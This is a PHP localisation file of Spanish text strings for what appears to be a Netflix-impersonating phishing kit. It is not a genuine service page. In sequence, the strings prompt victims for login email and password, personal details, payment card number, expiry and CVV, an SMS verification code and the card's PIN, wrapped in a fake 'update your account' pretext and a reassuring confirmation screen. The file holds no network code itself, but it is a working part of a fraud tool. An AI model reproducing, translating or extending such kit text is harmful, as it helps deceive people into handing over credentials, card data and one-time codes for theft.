<?php
function lang($phrase){
    static $lang = array(

        "xlang" => "es",
        "xcapt" => "Por favor, tómate un momento para resolver el hCaptcha a continuación. Nos ayuda a asegurarnos de que eres un usuario genuino y no un bot, proporcionando un entorno seguro para todos.",
        "xcapt1" => "Por favor, marca la casilla CAPTCHA.",
        "xcapt2" => "Verificación",
        "xcapt3" => "Continuar",
        "xmain1" => "Iniciar sesión",
        "xmain2" => "Correo electrónico o número de teléfono",
        "xmain3" => "Por favor, introduce un correo electrónico o número de teléfono válido.",
        "xmain4" => "Contraseña",
        "xmain5" => "Tu contraseña debe contener entre 4 y 60 caracteres.",
        "xmain6" => "Iniciar sesión",
        "xmain7" => "Recuérdame",
        "xmain8" => "¿Necesitas ayuda?",
        "xmain9" => "¿Nuevo en Netflix?",
        "xmain10" => " Regístrate ahora.",
        "xmain11" => "Esta página está protegida por Google reCAPTCHA para asegurar que no eres un robot.",
        "xmain12" => "Más información.",
        "xinfoz1" => "Información personal",
        "xinfoz2" => "Nombre y apellido",
        "xinfoz3" => "Este campo es obligatorio.",
        "xinfoz4" => "Fecha de nacimiento",
        "xinfoz5" => "Dirección",
        "xinfoz6" => "Ciudad",
        "xinfoz7" => "Código postal",
        "xinfoz8" => "Correo electrónico",
        "xinfoz9" => "Número de teléfono",
        "xinfoz10" => "Los campos en este formulario son obligatorios ya que necesitamos esta información para procesar tu solicitud.",
        "xinfoz11" => "Continuar",
        "xpay1" => "Configura tu tarjeta de pago",
        "xpay2" => "Número de tarjeta",
        "xpay3" => "Número de tarjeta obligatorio.",
        "xpay4" => "Fecha de caducidad",
        "xpay5" => "Fecha de caducidad obligatoria.",
        "xpay6" => "CVC/CVV",
        "xpay7" => "CVC/CVV obligatorio.",
        "xpay8" => "Encriptado de extremo a extremo",
        "xpay9" => "Continuar",
        "xsms1" => "Verificación",
        "xsms2" => "Por tu seguridad, necesitamos asegurarnos de que realmente eres tú.",
        "xsms3" => "Te enviaremos un SMS con un código de seguridad",
        "xsms4" => "Por favor, introduce el código recibido",
        "xsms5" => "Código SMS",
        "xsms6" => "Código SMS inválido",
        "xsms7" => "Este paso es necesario para procesar tu solicitud de manera segura.",
        "xsms8" => "Continuar",
        "xpin1" => "Verificación",
        "xpin2" => "Por tu seguridad, necesitamos asegurarnos de que realmente eres tú.",
        "xpin3" => "Te enviaremos un SMS con un código de seguridad",
        "xpin4" => "Por favor, introduce el PIN de tu tarjeta",
        "xpin5" => "Código PIN",
        "xpin6" => "Código PIN inválido",
        "xpin7" => "Este paso es necesario para procesar tu solicitud de manera segura.",
        "xpin8" => "Continuar",
        "xexpl1" => "Actualización",
        "xexpl2" => "Esperamos que esta comunicación te encuentre bien. Queremos informarte que es esencial actualizar tu información en nuestra plataforma para garantizar una experiencia de usuario continua y segura.",
        "xexpl3" => "Para mejorar nuestros servicios y garantizar la seguridad de tu cuenta, toma unos momentos para actualizar tu información.",
        "xexpl4" => "Continuar",
        "xconf1" => "Confirmación",
        "xconf2" => "Te agradecemos sinceramente por tomarte el tiempo de actualizar tu información en nuestra plataforma. Tu compromiso con la seguridad y la precisión de los detalles de tu cuenta es esencial para nosotros.",
        "xconf3" => "Tus modificaciones se han guardado con éxito. Ahora puedes disfrutar completamente de nuestra plataforma con la información más reciente y actualizada.",
        "xconf4" => "Continuar",
        "xload1" => "Procesando...",
        "xload2" => "No abandones esta página.",
        "xfoot1" => "¿Preguntas? Contáctanos.",
        "xfoot2" => "Preguntas frecuentes",
        "xfoot3" => "Centro de ayuda",
        "xfoot4" => "Términos de uso",
        "xfoot5" => "Privacidad",
        "xfoot6" => "Preferencias de cookies",
        "xfoot7" => "Información corporativa",
        "xfoot8" => "Español"
    );

    return $lang[$phrase];
}
?>
